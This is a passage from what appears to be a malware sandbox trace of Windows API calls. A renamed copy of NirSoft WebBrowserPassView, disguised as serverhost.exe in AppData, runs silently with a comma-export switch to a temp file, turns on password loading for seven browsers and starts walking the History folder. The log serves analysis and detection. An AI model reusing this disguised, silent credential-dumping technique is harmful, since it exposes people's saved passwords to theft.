returned="NirSoft Freeware. http://www." [0085.696] wcsncat (in: _Dest=0x28f95a, _Source="n", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.n") returned="NirSoft Freeware. http://www.n" [0085.696] wcsncat (in: _Dest=0x28f95a, _Source="i", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.ni") returned="NirSoft Freeware. http://www.ni" [0085.696] wcsncat (in: _Dest=0x28f95a, _Source="r", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.nir") returned="NirSoft Freeware. http://www.nir" [0085.696] wcsncat (in: _Dest=0x28f95a, _Source="s", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.nirs") returned="NirSoft Freeware. http://www.nirs" [0085.696] wcsncat (in: _Dest=0x28f95a, _Source="o", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.nirso") returned="NirSoft Freeware. http://www.nirso" [0085.696] wcsncat (in: _Dest=0x28f95a, _Source="f", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.nirsof") returned="NirSoft Freeware. http://www.nirsof" [0085.696] wcsncat (in: _Dest=0x28f95a, _Source="t", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.nirsoft") returned="NirSoft Freeware. http://www.nirsoft" [0085.696] wcsncat (in: _Dest=0x28f95a, _Source=".", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.nirsoft.") returned="NirSoft Freeware. http://www.nirsoft." [0085.696] wcsncat (in: _Dest=0x28f95a, _Source="n", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.nirsoft.n") returned="NirSoft Freeware. http://www.nirsoft.n" [0085.696] wcsncat (in: _Dest=0x28f95a, _Source="e", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.nirsoft.ne") returned="NirSoft Freeware. http://www.nirsoft.ne" [0085.696] wcsncat (in: _Dest=0x28f95a, _Source="t", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.nirsoft.net") returned="NirSoft Freeware. http://www.nirsoft.net" [0085.696] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0085.696] LoadIconW (hInstance=0x400000, lpIconName=0x65) returned 0x2301d9 [0085.696] wcscpy (in: _Dest=0x28f4d4, _Source="WebBrowserPassView" | out: _Dest="WebBrowserPassView") returned="WebBrowserPassView" [0085.697] wcslen (_String="/scomma") returned 0x7 [0085.697] wcslen (_String="C:\\ProgramData\\C571.tmp") returned 0x17 [0085.697] _wcsicmp (_String1="/savelangfile", _String2="/scomma") returned -2 [0085.697] _wcsicmp (_String1="/savelangfile", _String2="C:\\ProgramData\\C571.tmp") returned -52 [0085.697] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x28f25c, nSize=0x104 | out: lpFilename="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe")) returned 0x47 [0085.697] wcscat (in: _Dest=0x28f25c, _Source="_lng.ini" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost_lng.ini") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost_lng.ini" [0085.697] GetFileAttributesW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost_lng.ini" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost_lng.ini")) returned 0xffffffff [0085.697] _wcsicmp (_String1="/deleteregkey", _String2="/scomma") returned -15 [0085.697] _wcsicmp (_String1="/deleteregkey", _String2="C:\\ProgramData\\C571.tmp") returned -52 [0085.698] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0085.698] LoadStringW (in: hInstance=0x400000, uID=0x3e9, lpBuffer=0x3e4f68, cchBufferMax=4095 | out: lpBuffer="URL") returned 0x3 [0085.698] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0085.698] LoadStringW (in: hInstance=0x400000, uID=0x3e9, lpBuffer=0x3e4f68, cchBufferMax=4095 | out: lpBuffer="URL") returned 0x3 [0085.698] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0085.698] LoadStringW (in: hInstance=0x400000, uID=0x3ea, lpBuffer=0x3e4f68, cchBufferMax=4095 | out: lpBuffer="Web Browser") returned 0xb [0085.698] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0085.698] LoadStringW (in: hInstance=0x400000, uID=0x3ea, lpBuffer=0x3e4f68, cchBufferMax=4095 | out: lpBuffer="Web Browser") returned 0xb [0085.698] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0085.698] LoadStringW (in: hInstance=0x400000, uID=0x3eb, lpBuffer=0x3e4f68, cchBufferMax=4095 | out: lpBuffer="User Name") returned 0x9 [0085.698] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0085.698] LoadStringW (in: hInstance=0x400000, uID=0x3eb, lpBuffer=0x3e4f68, cchBufferMax=4095 | out: lpBuffer="User Name") returned 0x9 [0085.699] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0085.699] LoadStringW (in: hInstance=0x400000, uID=0x3ec, lpBuffer=0x3e4f68, cchBufferMax=4095 | out: lpBuffer="Password") returned 0x8 [0085.699] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0085.699] LoadStringW (in: hInstance=0x400000, uID=0x3ec, lpBuffer=0x3e4f68, cchBufferMax=4095 | out: lpBuffer="Password") returned 0x8 [0085.699] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0085.699] LoadStringW (in: hInstance=0x400000, uID=0x3ed, lpBuffer=0x3e4f68, cchBufferMax=4095 | out: lpBuffer="Password Strength") returned 0x11 [0085.699] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0085.699] LoadStringW (in: hInstance=0x400000, uID=0x3ed, lpBuffer=0x3e4f68, cchBufferMax=4095 | out: lpBuffer="Password Strength") returned 0x11 [0085.699] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0085.699] LoadStringW (in: hInstance=0x400000, uID=0x3ee, lpBuffer=0x3e4f68, cchBufferMax=4095 | out: lpBuffer="User Name Field") returned 0xf [0085.699] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0085.699] LoadStringW (in: hInstance=0x400000, uID=0x3ee, lpBuffer=0x3e4f68, cchBufferMax=4095 | out: lpBuffer="User Name Field") returned 0xf [0085.699] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0085.699] LoadStringW (in: hInstance=0x400000, uID=0x3ef, lpBuffer=0x3e4f68, cchBufferMax=4095 | out: lpBuffer="Password Field") returned 0xe [0085.699] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0085.699] LoadStringW (in: hInstance=0x400000, uID=0x3ef, lpBuffer=0x3e4f68, cchBufferMax=4095 | out: lpBuffer="Password Field") returned 0xe [0085.699] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0085.699] LoadStringW (in: hInstance=0x400000, uID=0x3f0, lpBuffer=0x3e4f68, cchBufferMax=4095 | out: lpBuffer="Created Time") returned 0xc [0085.700] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0085.700] LoadStringW (in: hInstance=0x400000, uID=0x3f0, lpBuffer=0x3e4f68, cchBufferMax=4095 | out: lpBuffer="Created Time") returned 0xc [0085.700] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0085.700] LoadStringW (in: hInstance=0x400000, uID=0x3f1, lpBuffer=0x3e4f68, cchBufferMax=4095 | out: lpBuffer="Modified Time") returned 0xd [0085.700] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0085.700] LoadStringW (in: hInstance=0x400000, uID=0x3f1, lpBuffer=0x3e4f68, cchBufferMax=4095 | out: lpBuffer="Modified Time") returned 0xd [0085.700] _wcsicmp (_String1="/stext", _String2="/scomma") returned 17 [0085.700] _wcsicmp (_String1="/shtml", _String2="/scomma") returned 5 [0085.700] _wcsicmp (_String1="/sverhtml", _String2="/scomma") returned 19 [0085.700] _wcsicmp (_String1="/sxml", _String2="/scomma") returned 21 [0085.700] _wcsicmp (_String1="/stab", _String2="/scomma") returned 17 [0085.700] _wcsicmp (_String1="/stabular", _String2="/scomma") returned 17 [0085.700] _wcsicmp (_String1="/scomma", _String2="/scomma") returned 0 [0085.700] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x28f234, nSize=0x104 | out: lpFilename="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe")) returned 0x47 [0085.700] wcscat (in: _Dest=0x28f234, _Source=".cfg" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.cfg") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.cfg" [0085.700] wcscpy (in: _Dest=0x28ee20, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.cfg" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.cfg") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.cfg" [0085.701] wcscpy (in: _Dest=0x28f02a, _Source="General" | out: _Dest="General") returned="General" [0085.701] GetPrivateProfileIntW (lpAppName="General", lpKeyName="ShowGridLines", nDefault=0, lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.cfg") returned 0x0 [0085.701] GetPrivateProfileIntW (lpAppName="General", lpKeyName="SaveFilterIndex", nDefault=0, lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.cfg") returned 0x0 [0085.701] GetPrivateProfileIntW (lpAppName="General", lpKeyName="ShowInfoTip", nDefault=1, lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.cfg") returned 0x1 [0085.701] GetPrivateProfileIntW (lpAppName="General", lpKeyName="MarkOddEvenRows", nDefault=0, lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.cfg") returned 0x0 [0085.701] GetPrivateProfileIntW (lpAppName="General", lpKeyName="ShowTimeInGMT", nDefault=0, lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.cfg") returned 0x0 [0085.701] GetPrivateProfileIntW (lpAppName="General", lpKeyName="LoadPasswordsIE", nDefault=1, lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.cfg") returned 0x1 [0085.701] GetPrivateProfileIntW (lpAppName="General", lpKeyName="LoadPasswordsFirefox", nDefault=1, lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.cfg") returned 0x1 [0085.701] GetPrivateProfileIntW (lpAppName="General", lpKeyName="LoadPasswordsChrome", nDefault=1, lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.cfg") returned 0x1 [0085.701] GetPrivateProfileIntW (lpAppName="General", lpKeyName="LoadPasswordsOpera", nDefault=1, lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.cfg") returned 0x1 [0085.701] GetPrivateProfileIntW (lpAppName="General", lpKeyName="LoadPasswordsSafari", nDefault=1, lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.cfg") returned 0x1 [0085.702] GetPrivateProfileIntW (lpAppName="General", lpKeyName="LoadPasswordsSeaMonkey", nDefault=1, lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.cfg") returned 0x1 [0085.702] GetPrivateProfileIntW (lpAppName="General", lpKeyName="LoadPasswordsYandex", nDefault=1, lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.cfg") returned 0x1 [0085.702] GetPrivateProfileIntW (lpAppName="General", lpKeyName="UseFirefoxProfileFolder", nDefault=0, lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.cfg") returned 0x0 [0085.702] GetPrivateProfileIntW (lpAppName="General", lpKeyName="UseFirefoxInstallFolder", nDefault=0, lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.cfg") returned 0x0 [0085.702] GetPrivateProfileIntW (lpAppName="General", lpKeyName="UseChromeProfileFolder", nDefault=0, lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.cfg") returned 0x0 [0085.702] GetPrivateProfileIntW (lpAppName="General", lpKeyName="UseOperaPasswordFile", nDefault=0, lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.cfg") returned 0x0 [0085.704] GetPrivateProfileStringW (in: lpAppName="General", lpKeyName="FirefoxProfileFolder", lpDefault="", lpReturnedString=0x3e3918, nSize=0x104, lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.cfg" | out: lpReturnedString="") returned 0x0 [0085.704] GetPrivateProfileStringW (in: lpAppName="General", lpKeyName="FirefoxInstallFolder", lpDefault="", lpReturnedString=0x3e3b22, nSize=0x104, lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.cfg" | out: lpReturnedString="") returned 0x0 [0085.704] GetPrivateProfileStringW (in: lpAppName="General", lpKeyName="ChromeProfileFolder", lpDefault="", lpReturnedString=0x3e3f30, nSize=0x104, lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.cfg" | out: lpReturnedString="") returned 0x0 [0085.704] GetPrivateProfileStringW (in: lpAppName="General", lpKeyName="OperaPasswordFile", lpDefault="", lpReturnedString=0x3e4140, nSize=0x104, lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.cfg" | out: lpReturnedString="") returned 0x0 [0085.704] GetPrivateProfileIntW (lpAppName="General", lpKeyName="SaveFileEncoeding", nDefault=0, lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.cfg") returned 0x0 [0085.704] GetPrivateProfileStringW (in: lpAppName="General", lpKeyName="WinPos", lpDefault="", lpReturnedString=0x28adcc, nSize=0x2000, lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.cfg" | out: lpReturnedString="") returned 0x0 [0085.704] wcslen (_String="") returned 0x0 [0085.704] GetPrivateProfileStringW (in: lpAppName="General", lpKeyName="Columns", lpDefault="", lpReturnedString=0x28adcc, nSize=0x2000, lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.cfg" | out: lpReturnedString="") returned 0x0 [0085.705] wcslen (_String="") returned 0x0 [0085.705] GetPrivateProfileIntW (lpAppName="General", lpKeyName="Sort", nDefault=0, lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.cfg") returned 0x0 [0085.705] wcscat (in: _Dest=0x28f200, _Source="ShowGridLines" | out: _Dest="/ShowGridLines") returned="/ShowGridLines" [0085.705] _wcsicmp (_String1="/ShowGridLines", _String2="/scomma") returned 5 [0085.705] _wcsicmp (_String1="/ShowGridLines", _String2="C:\\ProgramData\\C571.tmp") returned -52 [0085.705] wcscat (in: _Dest=0x28f200, _Source="SaveFilterIndex" | out: _Dest="/SaveFilterIndex") returned="/SaveFilterIndex" [0085.705] _wcsicmp (_String1="/SaveFilterIndex", _String2="/scomma") returned -2 [0085.705] _wcsicmp (_String1="/SaveFilterIndex", _String2="C:\\ProgramData\\C571.tmp") returned -52 [0085.705] wcscat (in: _Dest=0x28f200, _Source="ShowInfoTip" | out: _Dest="/ShowInfoTip") returned="/ShowInfoTip" [0085.705] _wcsicmp (_String1="/ShowInfoTip", _String2="/scomma") returned 5 [0085.705] _wcsicmp (_String1="/ShowInfoTip", _String2="C:\\ProgramData\\C571.tmp") returned -52 [0085.705] wcscat (in: _Dest=0x28f200, _Source="MarkOddEvenRows" | out: _Dest="/MarkOddEvenRows") returned="/MarkOddEvenRows" [0085.705] _wcsicmp (_String1="/MarkOddEvenRows", _String2="/scomma") returned -6 [0085.705] _wcsicmp (_String1="/MarkOddEvenRows", _String2="C:\\ProgramData\\C571.tmp") returned -52 [0085.705] wcscat (in: _Dest=0x28f200, _Source="ShowTimeInGMT" | out: _Dest="/ShowTimeInGMT") returned="/ShowTimeInGMT" [0085.705] _wcsicmp (_String1="/ShowTimeInGMT", _String2="/scomma") returned 5 [0085.705] _wcsicmp (_String1="/ShowTimeInGMT", _String2="C:\\ProgramData\\C571.tmp") returned -52 [0085.705] wcscat (in: _Dest=0x28f200, _Source="LoadPasswordsIE" | out: _Dest="/LoadPasswordsIE") returned="/LoadPasswordsIE" [0085.705] _wcsicmp (_String1="/LoadPasswordsIE", _String2="/scomma") returned -7 [0085.705] _wcsicmp (_String1="/LoadPasswordsIE", _String2="C:\\ProgramData\\C571.tmp") returned -52 [0085.705] wcscat (in: _Dest=0x28f200, _Source="LoadPasswordsFirefox" | out: _Dest="/LoadPasswordsFirefox") returned="/LoadPasswordsFirefox" [0085.705] _wcsicmp (_String1="/LoadPasswordsFirefox", _String2="/scomma") returned -7 [0085.705] _wcsicmp (_String1="/LoadPasswordsFirefox", _String2="C:\\ProgramData\\C571.tmp") returned -52 [0085.705] wcscat (in: _Dest=0x28f200, _Source="LoadPasswordsChrome" | out: _Dest="/LoadPasswordsChrome") returned="/LoadPasswordsChrome" [0085.705] _wcsicmp (_String1="/LoadPasswordsChrome", _String2="/scomma") returned -7 [0085.705] _wcsicmp (_String1="/LoadPasswordsChrome", _String2="C:\\ProgramData\\C571.tmp") returned -52 [0085.705] wcscat (in: _Dest=0x28f200, _Source="LoadPasswordsOpera" | out: _Dest="/LoadPasswordsOpera") returned="/LoadPasswordsOpera" [0085.705] _wcsicmp (_String1="/LoadPasswordsOpera", _String2="/scomma") returned -7 [0085.705] _wcsicmp (_String1="/LoadPasswordsOpera", _String2="C:\\ProgramData\\C571.tmp") returned -52 [0085.705] wcscat (in: _Dest=0x28f200, _Source="LoadPasswordsSafari" | out: _Dest="/LoadPasswordsSafari") returned="/LoadPasswordsSafari" [0085.705] _wcsicmp (_String1="/LoadPasswordsSafari", _String2="/scomma") returned -7 [0085.705] _wcsicmp (_String1="/LoadPasswordsSafari", _String2="C:\\ProgramData\\C571.tmp") returned -52 [0085.706] wcscat (in: _Dest=0x28f200, _Source="LoadPasswordsSeaMonkey" | out: _Dest="/LoadPasswordsSeaMonkey") returned="/LoadPasswordsSeaMonkey" [0085.706] _wcsicmp (_String1="/LoadPasswordsSeaMonkey", _String2="/scomma") returned -7 [0085.706] _wcsicmp (_String1="/LoadPasswordsSeaMonkey", _String2="C:\\ProgramData\\C571.tmp") returned -52 [0085.706] wcscat (in: _Dest=0x28f200, _Source="LoadPasswordsYandex" | out: _Dest="/LoadPasswordsYandex") returned="/LoadPasswordsYandex" [0085.706] _wcsicmp (_String1="/LoadPasswordsYandex", _String2="/scomma") returned -7 [0085.706] _wcsicmp (_String1="/LoadPasswordsYandex", _String2="C:\\ProgramData\\C571.tmp") returned -52 [0085.706] wcscat (in: _Dest=0x28f200, _Source="UseFirefoxProfileFolder" | out: _Dest="/UseFirefoxProfileFolder") returned="/UseFirefoxProfileFolder" [0085.706] _wcsicmp (_String1="/UseFirefoxProfileFolder", _String2="/scomma") returned 2 [0085.706] _wcsicmp (_String1="/UseFirefoxProfileFolder", _String2="C:\\ProgramData\\C571.tmp") returned -52 [0085.706] wcscat (in: _Dest=0x28f200, _Source="UseFirefoxInstallFolder" | out: _Dest="/UseFirefoxInstallFolder") returned="/UseFirefoxInstallFolder" [0085.706] _wcsicmp (_String1="/UseFirefoxInstallFolder", _String2="/scomma") returned 2 [0085.706] _wcsicmp (_String1="/UseFirefoxInstallFolder", _String2="C:\\ProgramData\\C571.tmp") returned -52 [0085.706] wcscat (in: _Dest=0x28f200, _Source="UseChromeProfileFolder" | out: _Dest="/UseChromeProfileFolder") returned="/UseChromeProfileFolder" [0085.706] _wcsicmp (_String1="/UseChromeProfileFolder", _String2="/scomma") returned 2 [0085.706] _wcsicmp (_String1="/UseChromeProfileFolder", _String2="C:\\ProgramData\\C571.tmp") returned -52 [0085.706] wcscat (in: _Dest=0x28f200, _Source="UseOperaPasswordFile" | out: _Dest="/UseOperaPasswordFile") returned="/UseOperaPasswordFile" [0085.706] _wcsicmp (_String1="/UseOperaPasswordFile", _String2="/scomma") returned 2 [0085.706] _wcsicmp (_String1="/UseOperaPasswordFile", _String2="C:\\ProgramData\\C571.tmp") returned -52 [0085.706] wcscat (in: _Dest=0x28f1fc, _Source="FirefoxProfileFolder" | out: _Dest="/FirefoxProfileFolder") returned="/FirefoxProfileFolder" [0085.706] _wcsicmp (_String1="/FirefoxProfileFolder", _String2="/scomma") returned -13 [0085.706] _wcsicmp (_String1="/FirefoxProfileFolder", _String2="C:\\ProgramData\\C571.tmp") returned -52 [0085.706] wcscat (in: _Dest=0x28f1fc, _Source="FirefoxInstallFolder" | out: _Dest="/FirefoxInstallFolder") returned="/FirefoxInstallFolder" [0085.706] _wcsicmp (_String1="/FirefoxInstallFolder", _String2="/scomma") returned -13 [0085.706] _wcsicmp (_String1="/FirefoxInstallFolder", _String2="C:\\ProgramData\\C571.tmp") returned -52 [0085.706] wcscat (in: _Dest=0x28f1fc, _Source="ChromeProfileFolder" | out: _Dest="/ChromeProfileFolder") returned="/ChromeProfileFolder" [0085.706] _wcsicmp (_String1="/ChromeProfileFolder", _String2="/scomma") returned -16 [0085.706] _wcsicmp (_String1="/ChromeProfileFolder", _String2="C:\\ProgramData\\C571.tmp") returned -52 [0085.706] wcscat (in: _Dest=0x28f1fc, _Source="OperaPasswordFile" | out: _Dest="/OperaPasswordFile") returned="/OperaPasswordFile" [0085.706] _wcsicmp (_String1="/OperaPasswordFile", _String2="/scomma") returned -4 [0085.706] _wcsicmp (_String1="/OperaPasswordFile", _String2="C:\\ProgramData\\C571.tmp") returned -52 [0085.706] wcscat (in: _Dest=0x28f200, _Source="SaveFileEncoeding" | out: _Dest="/SaveFileEncoeding") returned="/SaveFileEncoeding" [0085.706] _wcsicmp (_String1="/SaveFileEncoeding", _String2="/scomma") returned -2 [0085.706] _wcsicmp (_String1="/SaveFileEncoeding", _String2="C:\\ProgramData\\C571.tmp") returned -52 [0085.706] _wcsicmp (_String1="/sort", _String2="/scomma") returned 12 [0085.706] _wcsicmp (_String1="/sort", _String2="C:\\ProgramData\\C571.tmp") returned -52 [0085.706] LoadCursorW (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0085.707] SetCursor (hCursor=0x10007) returned 0x10007 [0085.707] GetVersionExW (in: lpVersionInformation=0x452e08*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x452e08*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0085.707] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x28a720, csidl=34, fCreate=0 | out: pszPath="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History") returned 1 [0085.726] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History") returned 0x40 [0085.727] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History") returned 0x40 [0085.727] wcslen (_String="*.*") returned 0x3 [0085.727] wcscpy (in: _Dest=0x289d1c, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History" [0085.727] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History") returned 0x40 [0085.727] wcscat (in: _Dest=0x289d1c, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\" [0085.727] wcscat (in: _Dest=0x289d1c, _Source="*.*" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\*.*") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\*.*" [0085.727] FindFirstFileW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\*.*", lpFindFileData=0x289fa4 | out: lpFindFileData=0x289fa4) returned 0x58e868 [0085.727] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History") returned 0x40 [0085.727] wcslen (_String=".") returned 0x1 [0085.727] wcscpy (in: _Dest=0x28a1f4, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History" [0085.727] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History") returned 0x40 [0085.727] wcscat (in: _Dest=0x28a1f4, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\" [0085.727] wcscat (in: _Dest=0x28a1f4, _Source="." | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\.") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\." [0085.727] wcscmp (_String1=".", _String2="..") returned -1 [0085.727] wcscmp (_String1=".", _String2=".") returned 0 [0085.727] _wcsicmp (_String1=".", _String2="index.dat") returned -59 [0085.727] FindNextFileW (in: hFindFile=0x58e868, lpFindFileData=0x289fa4 | out: lpFindFileData=0x289fa4) returned 1 [0085.727] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History") returned 0x40 [0085.727] wcslen (_String="..") returned 0x2 [0085.727] wcscpy (in: _Dest=0x28a1f4, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History" [0085.727] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History") returned 0x40 [0085.727] wcscat (in: _Dest=0x28a1f4, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\" [0085.727] wcscat (in: _Dest=0x28a1f4, _Source=".." | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\..") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\.." [0085.727] wcscmp (_String1="..", _String2="..") returned 0 [0085.727] _wcsicmp (_String1="..", _String2="index.dat") returned -59 [0085.727] FindNextFileW (in: hFindFile=0x58e868, lpFindFileData=0x289fa4 | out: lpFindFileData=0x289fa4) returned 1 [0085.727] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History") returned 0x40 [0085.727] wcslen (_String="desktop.ini") returned 0xb [0085.727] wcscpy (in: _Dest=0x28a1f4, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History" [0085.727] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History") returned 0x40 [0085.727] wcscat (in: _Dest=0x28a1f4, _Source="\\" | out: 